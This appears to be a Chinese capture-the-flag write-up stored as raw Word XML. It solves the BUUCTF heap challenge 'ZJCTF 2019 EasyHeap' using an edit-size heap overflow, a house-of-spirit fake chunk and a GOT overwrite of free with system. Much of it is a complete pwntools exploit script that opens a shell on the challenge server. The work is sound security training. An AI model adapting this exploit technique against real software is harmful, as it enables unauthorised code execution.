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instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/xlrp/p/14273619.html" </w:instrTex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spacing w:val="0"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/xlrp/p/14273619.html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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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33"/>
          <w:szCs w:val="33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[ZJCTF 2019]EasyHeap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instrText xml:space="preserve"> HYPERLINK "https://files.buuoj.cn/files/6a746d71a363f7d044efb27acbf1e7cc/easyheap.zip?token=eyJ1c2VyX2lkIjoxNTM3MSwidGVhbV9pZCI6bnVsbCwiZmlsZV9pZCI6NDUyfQ.X9nOdQ.-3Cq95DdhXvFbGvKUpGHhKEra34"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t>附件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步骤：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例行检查，64位程序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3571875" cy="885825"/>
            <wp:effectExtent l="0" t="0" r="9525" b="133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试运行一下看看程序大概执行的情况，经典的堆块的菜单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4876800" cy="1628775"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905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64位ida载入，首先检索字符串，发现了读出flag的函数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11039475" cy="5276850"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1143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3947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看一下每个选项的函数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add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4333875" cy="5581650"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1143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这边size的大小由我们输入控制，heaparray数组在bss段上存放着我们chunk的指针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edit，简单的根据指针修改对应chunk里的值，但是这里的size也是由我们手动输入的，也就是说只要我们这边输入的size比add的时候输入的size大就会造成溢出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4343400" cy="5962650"/>
            <wp:effectExtent l="0" t="0" r="0" b="1143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delete，释放掉堆块，指针置为0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4286250" cy="5286375"/>
            <wp:effectExtent l="0" t="0" r="11430" b="1905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之前看到的读出flag的函数在满足一定条件的时候是可以执行的，但是在BUU上的flag文件没有放到那个目录下，所以只能想其他办法了，但是这边的system函数还是可以利用的。看其他师傅的wp里都是用的house of spirit （伪造堆块），关于house of spirit可以看下面的链接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instrText xml:space="preserve"> HYPERLINK "https://blog.csdn.net/zhulintintao/article/details/109889960"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t>https://blog.csdn.net/zhulintintao/article/details/109889960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instrText xml:space="preserve"> HYPERLINK "https://zhuanlan.zhihu.com/p/61546352"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t>https://zhuanlan.zhihu.com/p/61546352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利用过程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首先创建3个chunk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create(0x68,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'aaaa'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  <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>#0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create(0x68,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'bbbb'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  <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>#1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i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14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create(0x68,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'cccc'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  <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>#2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我们先free掉chunk2，然后再通过修改chunk1，造成堆溢出修改chunk2的fd指针，使其指向fake_chunk（我们伪造的堆）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payload =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'/bin/sh\x00'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 +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'a'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 * 0x60 + p64(0x71) + p64(0x6020ad)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i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14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edit(1,len(payload),payload)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说一下为什么我们构造的fake_chunk的地址是0x6020ad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因为我们的目的是控制heaparray数组，从heaparray地址往上找，找到此处，可以看到其size大小为0x7f ，我们可以用 house of spirit 技术，伪造 chunk 至 heaparray 附近，在操作 malloc fastbin 时需要检查大小，我们可以巧妙地利用地址开头 7f 来伪造大小为 0x70 的 fastbin，绕过malloc的检查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6924675" cy="1885950"/>
            <wp:effectExtent l="0" t="0" r="9525" b="381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然后两次create 调用malloc，第一次返还chunk2给我们，第二次将fake chunk返还给我们，然后我们就可以通过fake_chunk修改heaparray的值，这里我们先将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heaparray[0]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修改为free函数的got地址，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create(0x68,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'aaaa'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create(0x68,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'c'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payload =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'\xaa'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 * 3 + p64(0) * 4 + p64(free_got)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i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14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edit(3,len(payload),payload)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然后再通过edit函数修改free_got表项为调用system的地址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payload = p64(elf.plt[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'system'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i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14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edit(0,len(payload),payload)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这样 free chunk 1 就会执行 system(’/bin/sh’) 拿 shell。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exp就直接放暖暖草果师傅的了，人家给exp的每一条语句写了注释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 from pwn import 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  <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>#p = process('./easyheap')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p = remote(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'node3.buuoj.cn'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 ,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'27234'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elf = ELF(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'./easyheap'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context.log_level =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'debug'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def create(size,content):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ab/>
        <w:t>p.recvuntil(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'Your choice :'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ab/>
        <w:t>p.sendline(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'1'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ab/>
        <w:t>p.recvuntil(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'Size of Heap : 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ab/>
        <w:t>p.send(str(size))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ab/>
        <w:t>p.recvuntil(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'Content of heap:'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ab/>
        <w:t>p.send(str(content))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def edit(index,size,content):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ab/>
        <w:t>p.recvuntil(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'Your choice :'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ab/>
        <w:t>p.sendline(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'2'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ab/>
        <w:t>p.recvuntil(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'Index :'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ab/>
        <w:t>p.sendline(str(index))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ab/>
        <w:t>p.recvuntil(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'Size of Heap : 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ab/>
        <w:t>p.send(str(size))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ab/>
        <w:t>p.recvuntil(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'Content of heap : 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ab/>
        <w:t>p.send(str(content))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def free(index):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ab/>
        <w:t>p.recvuntil(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'Your choice :'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ab/>
        <w:t>p.sendline(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'3'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ab/>
        <w:t>p.recvuntil(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'Index :'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ab/>
        <w:t>p.sendline(str(index))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free_got = elf.got[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'free'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create(0x68,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'aaaa'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  <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t># chunk 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create(0x68,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'bbbb'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  <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t># chunk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create(0x68,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'cccc'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  <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t># chunk 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free(2)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  <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t># 释放 heap2 让其进入 fastbin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payload =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'/bin/sh\x00'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 +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'a'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 * 0x60 + p64(0x71) + p64(0x6020ad)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edit(1,len(payload),payload)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  <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t># 修改 heap1 内容为 '/bin/sh\x00', 以及堆溢出 heap2(freed) 修改其 fd 指针 # 因为最后释放的是 heap1,利用 '__free_hook'(system) Getshell # 为什么是 0x6020ad? 这是调试出来的# FakeChunk 若以这里为 prev_size，则 size 正好是一个 0x000000000000007f# 可以绕过 malloc_chunk 的合法性验证 (new_chunk 的 size 位要与 bin 链表 size 一致)# 这样就伪造出了一个 chunk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create(0x68,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'aaaa'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  <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t># chunk 2 (从 fastbin 里取出的)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create(0x68,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'c'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  <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t># chunk 3 / idx = 0 (Fake)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payload =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'\xaa'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 * 3 + p64(0) * 4 + p64(free_got)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edit(3,len(payload),payload)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  <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t xml:space="preserve"># 修改 heap3 (Fake)# 作用是把 heaparray[0] 的地址 (原先记录的是 chunk 3 的地址) 覆写成 free_got 地址# 这就是要在 heaparry 附近构造 Fakeheap 的原因# 确定具体的偏移量需要动态调试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payload = p64(elf.plt[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'system'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edit(0,len(payload),payload)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  <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t># free_got 地址的作用在这里体现了# 由于 edit() 的目标是 heaparry[] 里面的地址# 那么本次操作将修改 free_got 为 system_plt 的地址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free(1)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  <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t># 当释放 chunk1 (内容为 '/bin/sh\0x00') 的时候# 把 chunk1 当参数传入 free() 中执行，由于 free() 地址已经被修改成 system()# 最后程序执行的就是 system(chunk1's content) 即 system('/bin/sh\0x00'), 成功 Getshell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i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14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p.interactive()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参考wp：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instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/zhwer/p/13781722.html"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t>https://www.cnblogs.com/zhwer/p/13781722.html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30DE98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E030DE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6740"/>
    <w:rsid w:val="63CB4D5A"/>
    <w:rsid w:val="6B8C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2022-03-08T16:03:35Z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